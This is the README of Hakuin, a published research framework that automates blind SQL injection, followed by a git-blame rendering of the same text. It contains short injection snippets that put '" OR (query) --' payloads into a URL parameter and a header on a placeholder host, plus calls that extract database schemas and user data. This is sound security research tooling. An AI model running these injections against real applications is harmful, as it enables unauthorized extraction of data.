hakuin/README.md

<p align="center">
    <img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
</p>

Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.

Hakuin been presented at academic and industrial conferences:
- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023
- [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023

Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).


## Installation
To install Hakuin, simply run:
```
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip install .
```
Developers should set the `-e` flag to install the framework in editable mode:
```bash
pip install -e .
```


## Examples
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the `Requester` and override the `request` method. Also, the method must determine whether the query resolved to `True` or `False`.


##### Example 1 - Query Parameter Injection with Status-based Inference
```python
import requests
from hakuin import Requester

class StatusRequester(Requester):
    def request(self, ctx, query):
        r = requests.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
        return r.status_code == 200
```

##### Example 2 - Header Injection with Content-based Inference
```python
class ContentRequester(Requester):
    def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        r = requests.get(f'http://vuln.com/', headers=headers)
        return 'found' in r.content.decode()
```

To start infering data, use the `Exfiltrator` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.

##### Example 1 - Inferring SQLite DBs
```python
from hakuin.dbms import SQLite
from hakuin import Exfiltrator, Requester

class StatusRequester(Requester):
    ...

exf = Exfiltrator(requester=StatusRequester(), dbms=SQLite())
```

##### Example 2 - Inferring MySQL DBs
```python
from hakuin.dbms import MySQL
...
exf = Exfiltrator(requester=StatusRequester(), dbms=MySQL())
```

Now that eveything is set, you can start inferring DB schemas.

##### Example 1 - Inferring DB Schemas
```python
# mode:
#   'binary_search':    Use binary search
#   'model_search':     Use pre-trained models
schema = exf.exfiltrate_schema(mode='model_search')
```

##### Example 2 - Inferring DB Schemas with Metadata
```python
# metadata:
#   True:   Detect column settings (data type, nullable, primary key)
#   False:  Pass
schema = exf.exfiltrate_schema(mode='model_search', metadata=True)
```

##### Example 3 - Inferring only Table/Column Names
```python
tables = exf.exfiltrate_tables(mode='model_search')
columns = exf.exfiltrate_columns(table='users', mode='model_search')
```

Once you know the schema, you can extract the actual content.

##### Example 1 - Inferring Textual Columns
```python
# mode:
#   'binary_search':    Use binary search
#   'adaptive_search':  Use five-gram model
#   'unigram_search':   Use unigram model
#   'dynamic_search':   Dynamically identify the best strategy. This setting
#                       also enables opportunistic guessing.
res = exfiltrate_text_data(table='users', column='address', mode='dynamic_search'):
```

More examples can be found in the `tests` directory.


## For Researchers
This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.


#### Cite Hakuin
```
@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}
```
publications and readme 2023-09-03 09:22:35 +02:00			`<p align="center">`
			`<img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">`
			`</p>`
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00
			`Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.`

readme update 2023-09-04 09:55:00 +02:00			`Hakuin been presented at academic and industrial conferences:`
search algorithms remastered 2023-09-04 04:40:27 +02:00			`- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023`
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`- [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023`

readme update 2023-09-04 09:56:03 +02:00			`Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).`
README 2022-08-15 04:51:48 +02:00

docstrings and others 2023-03-23 08:53:36 +01:00			`## Installation`
			`To install Hakuin, simply run:`
			```
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`git clone git@github.com:pruzko/hakuin.git`
			`cd hakuin`
			`pip install .`
			```
			Developers should set the `-e` flag to install the framework in editable mode:
			```bash
			`pip install -e .`
docstrings and others 2023-03-23 08:53:36 +01:00			```
README 2022-08-15 04:51:48 +02:00
docstrings and others 2023-03-23 08:53:36 +01:00
			`## Examples`
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the `Requester` and override the `request` method. Also, the method must determine whether the query resolved to `True` or `False`.


			`##### Example 1 - Query Parameter Injection with Status-based Inference`
			```python
docstrings and others 2023-03-23 08:53:36 +01:00			`import requests`
			`from hakuin import Requester`

			`class StatusRequester(Requester):`
			`def request(self, ctx, query):`
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`r = requests.get(f'http://vuln.com/?n=XXX" OR ({query}) --')`
docstrings and others 2023-03-23 08:53:36 +01:00			`return r.status_code == 200`
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			```
docstrings and others 2023-03-23 08:53:36 +01:00
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`##### Example 2 - Header Injection with Content-based Inference`
			```python
docstrings and others 2023-03-23 08:53:36 +01:00			`class ContentRequester(Requester):`
			`def request(self, ctx, query):`
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`headers = {'vulnerable-header': f'xxx" OR ({query}) --'}`
docstrings and others 2023-03-23 08:53:36 +01:00			`r = requests.get(f'http://vuln.com/', headers=headers)`
			`return 'found' in r.content.decode()`
			```

Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			To start infering data, use the `Exfiltrator` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
docstrings and others 2023-03-23 08:53:36 +01:00
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`##### Example 1 - Inferring SQLite DBs`
			```python
docstrings and others 2023-03-23 08:53:36 +01:00			`from hakuin.dbms import SQLite`
			`from hakuin import Exfiltrator, Requester`

			`class StatusRequester(Requester):`
			`...`

			`exf = Exfiltrator(requester=StatusRequester(), dbms=SQLite())`
			```

Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`##### Example 2 - Inferring MySQL DBs`
			```python
			`from hakuin.dbms import MySQL`
			`...`
			`exf = Exfiltrator(requester=StatusRequester(), dbms=MySQL())`
docstrings and others 2023-03-23 08:53:36 +01:00			```
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00
			`Now that eveything is set, you can start inferring DB schemas.`

			`##### Example 1 - Inferring DB Schemas`
			```python
			`# mode:`
			`# 'binary_search': Use binary search`
			`# 'model_search': Use pre-trained models`
			`schema = exf.exfiltrate_schema(mode='model_search')`
docstrings and others 2023-03-23 08:53:36 +01:00			```

Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`##### Example 2 - Inferring DB Schemas with Metadata`
			```python
			`# metadata:`
			`# True: Detect column settings (data type, nullable, primary key)`
			`# False: Pass`
			`schema = exf.exfiltrate_schema(mode='model_search', metadata=True)`
			```
docstrings and others 2023-03-23 08:53:36 +01:00
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			`##### Example 3 - Inferring only Table/Column Names`
			```python
			`tables = exf.exfiltrate_tables(mode='model_search')`
			`columns = exf.exfiltrate_columns(table='users', mode='model_search')`
docstrings and others 2023-03-23 08:53:36 +01:00			```
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00
			`Once you know the schema, you can extract the actual content.`

			`##### Example 1 - Inferring Textual Columns`
			```python
			`# mode:`
			`# 'binary_search': Use binary search`
			`# 'adaptive_search': Use five-gram model`
			`# 'unigram_search': Use unigram model`
			`# 'dynamic_search': Dynamically identify the best strategy. This setting`
			`# also enables opportunistic guessing.`
docstrings and others 2023-03-23 08:53:36 +01:00			`res = exfiltrate_text_data(table='users', column='address', mode='dynamic_search'):`
			```

Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00			More examples can be found in the `tests` directory.

docstrings and others 2023-03-23 08:53:36 +01:00
Remaster - readme, installation, cleanup, tests, mysql 2023-09-02 06:32:42 +02:00
			`## For Researchers`
			`This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.`


			`#### Cite Hakuin`
			```
			`@inproceedings{hakuin_bsqli,`
			`title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},`
			`author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},`
			`booktitle={2023 IEEE Security and Privacy Workshops (SPW)},`
			`pages={384--393},`
			`year={2023},`
			`organization={IEEE}`
			`}`
			```